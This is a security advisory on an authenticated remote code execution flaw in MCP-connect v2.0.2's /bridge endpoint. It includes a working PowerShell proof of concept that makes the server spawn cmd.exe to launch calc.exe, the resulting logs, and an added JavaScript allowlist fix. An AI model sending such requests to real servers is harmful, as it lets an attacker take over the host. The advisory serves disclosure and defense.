Executive Summary
A security vulnerability exists in MCP-connect v2.0.2 in the /bridge endpoint.
Although the application enforces Bearer token authentication, it allows an authenticated user to supply arbitrary values for serverPath, args, and env. These parameters are used directly to initialize a local process via StdioClientTransport, without validation or restriction.
As a result, an authenticated attacker can:
- execute arbitrary system commands on the host machine
This leads to authenticated remote code execution (RCE).
Proof of Concept (PoC)
Prerequisites
- MCP-connect v2.0.2 running locally
- Valid authentication token: ACCESS_TOKEN=labtest
Exploit (PowerShell)
# Target configuration
$url = "http://127.0.0.1:3000/bridge"
$token = "labtest"
# Exploit payload: execute arbitrary system binary
$body = @{
    serverPath = "cmd.exe"
    args = @("/c", "calc.exe")
    method = "exploit_poc"
    params = @{}
} | ConvertTo-Json -Compress
# Send exploit request (backticks continue the command across lines)
Write-Host "Sending exploit..."
try {
    Invoke-WebRequest -Uri $url -Method POST `
        -Headers @{ Authorization = "Bearer $token" } -ContentType "application/json" `
        -Body $body
} catch {
    Write-Host "Expected error (process already executed): $_"
}
Observed Behavior
Server logs:
info: Bridge request received: {"serverPath":"cmd.exe","args":["/c","calc.exe"],...}
info: Creating client client_... for cmd.exe
error: Failed to create client for cmd.exe: MCP error -32000: Connection closed
System behavior:
calc.exe is executed on the host system
Key Observation
Even though the server returns an error (500 / MCP connection failure), the command execution occurs before the protocol handshake fails.
This confirms that arbitrary command execution is successfully triggered by user-controlled input.
Impact
An authenticated attacker can:
- Execute arbitrary operating system commands
- Spawn reverse shells
- Access and manipulate local files
- Abuse installed system tools
- Establish persistence on the host
The vulnerability results in full compromise of the host system, depending on the privileges of the running process.
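One way to close the gap described in the summary, shown as an added example that is not MCP-connect's own code or an official fix: treat serverPath as a key into an operator-defined registry, and refuse caller-supplied args and unlisted env names before anything reaches StdioClientTransport. ALLOWED_SERVERS, BridgeRejected, resolveBridgeTarget and the registry values are hypothetical names and constructed sample values.

```javascript
// Added example: allowlist gate for /bridge input. All names here are
// hypothetical and the registry values are constructed samples.

// Operator-defined registry. The client picks an entry by name; the
// executable and its arguments never come from the request body.
const ALLOWED_SERVERS = Object.freeze({
  filesystem: {
    command: '/usr/local/bin/mcp-server-filesystem',
    baseArgs: ['--root', '/srv/mcp-data'],
    allowedEnv: ['LOG_LEVEL'],
  },
});

class BridgeRejected extends Error {}

function resolveBridgeTarget(body, registry = ALLOWED_SERVERS) {
  const { serverPath, args = [], env = {} } = body ?? {};

  // serverPath is a registry key, never a path or binary name. The own-property
  // check also rejects keys such as "__proto__" or "constructor".
  if (typeof serverPath !== 'string' ||
      !Object.prototype.hasOwnProperty.call(registry, serverPath)) {
    throw new BridgeRejected('serverPath is not a registered server');
  }
  const entry = registry[serverPath];

  // This sketch accepts no caller-supplied arguments at all.
  if (!Array.isArray(args) || args.length !== 0) {
    throw new BridgeRejected('caller-supplied args are not accepted');
  }

  // Only env names the operator listed, with string values, pass through.
  if (env === null || typeof env !== 'object' || Array.isArray(env)) {
    throw new BridgeRejected('env must be an object');
  }
  const cleanEnv = {};
  for (const [name, value] of Object.entries(env)) {
    if (!entry.allowedEnv.includes(name) || typeof value !== 'string') {
      throw new BridgeRejected(`env variable not permitted: ${name}`);
    }
    cleanEnv[name] = value;
  }

  // The caller builds the stdio transport from this object only, and treats
  // BridgeRejected as a client error without spawning anything.
  return { command: entry.command, args: [...entry.baseArgs], env: cleanEnv };
}
```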